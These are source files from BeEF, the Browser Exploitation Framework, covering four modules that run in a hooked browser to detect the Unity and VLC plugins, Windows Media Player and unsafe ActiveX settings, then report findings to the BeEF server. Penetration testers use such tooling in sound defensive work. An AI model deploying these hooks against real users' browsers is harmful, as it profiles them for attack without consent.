// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var hasUnity = function() { // Internet Explorer if ( beef.browser.isIE() ) { try { var unity_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1'); } catch (e) { } if ( unity_test ) { return true; } // Not Internet Explorer } else if ( navigator.mimeTypes && navigator.mimeTypes["application/vnd.unity"] ) { if ( navigator.mimeTypes["application/vnd.unity"].enabledPlugin && navigator.plugins && navigator.plugins["Unity Player"] ) { return true; } } return false; } if ( hasUnity() ) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled"); if ( !beef.browser.isIE() ) { var unityRegex = /Unity Web Player version (.*). \(c\)/g; var match = unityRegex.exec(navigator.plugins["Unity Player"].description); beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity version = "+ match[1]); } } else { beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is not enabled"); } });
YAML
beef/modules/browser/detect_unity/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: Detect_unity: enable: true category: "Browser" name: "Detect Unity Web Player" description: "Detects Unity Web Player." authors: ["gcattani"] target: working: ["All"]
Ruby
beef/modules/browser/detect_unity/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_unity < BeEF::Core::Command def post_execute content = {} content['unity'] = @datastore['unity'] save content end end
JavaScript
beef/modules/browser/detect_unsafe_activex/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var unsafe = true; var result = ""; var test; try { test = new ActiveXObject("WbemScripting.SWbemLocator"); } catch (e) { unsafe = false; } test = null; if (unsafe) { result = "Browser is configured for unsafe ActiveX"; } else { result = "Browser is NOT configured for unsafe ActiveX"; } beef.net.send("<%= @command_url %>", <%= @command_id %>, "unsafe_activex="+result); });
YAML
beef/modules/browser/detect_unsafe_activex/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_unsafe_activex: enable: true category: "Browser" name: "Detect Unsafe ActiveX" description: "This module will check if IE has been insecurely configured. It will test if the option \"Initialize and script ActiveX controls not marked as safe for scripting\" is enabled.<br /><br />The setting can be found in: Tools Menu -> Internet Options -> Security -> Custom level -> \"Initialize and script ActiveX controls not marked as safe for scripting\"" authors: ["wade", "bcoles"] target: user_notify: ["IE"] not_working: ["All"]
Ruby
beef/modules/browser/detect_unsafe_activex/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_unsafe_activex < BeEF::Core::Command def post_execute content = {} content['unsafe_activex'] = @datastore['unsafe_activex'] save content end end
JavaScript
beef/modules/browser/detect_vlc/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = ( beef.browser.hasVLC() )? "Yes" : "No"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "vlc="+result); });
YAML
beef/modules/browser/detect_vlc/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_vlc: enable: true category: "Browser" name: "Detect VLC" description: "This module will check if the browser has VLC plugin." authors: ["nbblrr"] target: working: ["IE", "FF", "C"]
Ruby
beef/modules/browser/detect_vlc/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_vlc < BeEF::Core::Command def post_execute content = {} content['vlc'] = @datastore['vlc'] save content BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', Regexp.last_match(1)) if @datastore['results'] =~ /^vlc=(Yes|No)/ end end
JavaScript
beef/modules/browser/detect_wmp/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = ( beef.browser.hasWMP() )? "Yes" : "No"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "wmp="+result); });
YAML
beef/modules/browser/detect_wmp/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_wmp: enable: true category: "Browser" name: "Detect Windows Media Player" description: "This module will check if the browser has the Windows Media Player plugin installed." authors: ["gcattani"] target: working: ["All"]
Ruby
beef/modules/browser/detect_wmp/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_wmp < BeEF::Core::Command def post_execute content = {} content['wmp'] = @datastore['wmp'] save content BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', Regexp.last_match(1)) if @datastore['results'] =~ /^wmp=(Yes|No)/ end end